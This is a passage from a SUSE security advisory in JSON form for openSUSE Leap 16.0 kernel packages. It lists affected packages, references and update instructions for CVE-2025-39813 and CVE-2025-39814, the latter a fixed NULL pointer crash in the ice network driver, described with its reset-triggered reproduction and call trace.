"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-39813"
},
{
"cve": "CVE-2025-39814",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39814"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: fix NULL pointer dereference in ice_unplug_aux_dev() on reset\n\nIssuing a reset when the driver is loaded without RDMA support, will\nresults in a crash as it attempts to remove RDMA\u0027s non-existent auxbus\ndevice:\necho 1 \u003e /sys/class/net/\u003cif\u003e/device/reset\n\nBUG: kernel NULL pointer dereference, address: 0000000000000008\n...\nRIP: 0010:ice_unplug_aux_dev+0x29/0x70 [ice]\n...\nCall Trace:\n\u003cTASK\u003e\nice_prepare_for_reset+0x77/0x260 [ice]\npci_dev_save_and_disable+0x2c/0x70\npci_reset_function+0x88/0x130\nreset_store+0x5a/0xa0\nkernfs_fop_write_iter+0x15e/0x210\nvfs_write+0x273/0x520\nksys_write+0x6b/0xe0\ndo_syscall_64+0x79/0x3b0\nentry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nice_unplug_aux_dev() checks pf-\u003ecdev_info-\u003eadev for NULL pointer, but\npf-\u003ecdev_info will also be NULL, leading to the deref in the trace above.\n\nIntroduce a flag to be set when the creation of the auxbus device is\nsuccessful, to avoid multiple NULL pointer checks in ice_unplug_aux_dev().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39814",
"url": "https://www.suse.com/security/cve/CVE-2025-39814"
},
{
"category": "external",
"summary": "SUSE Bug 1249895 for CVE-2025-39814",
"url": "https://bugzilla.suse.com/1249895"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
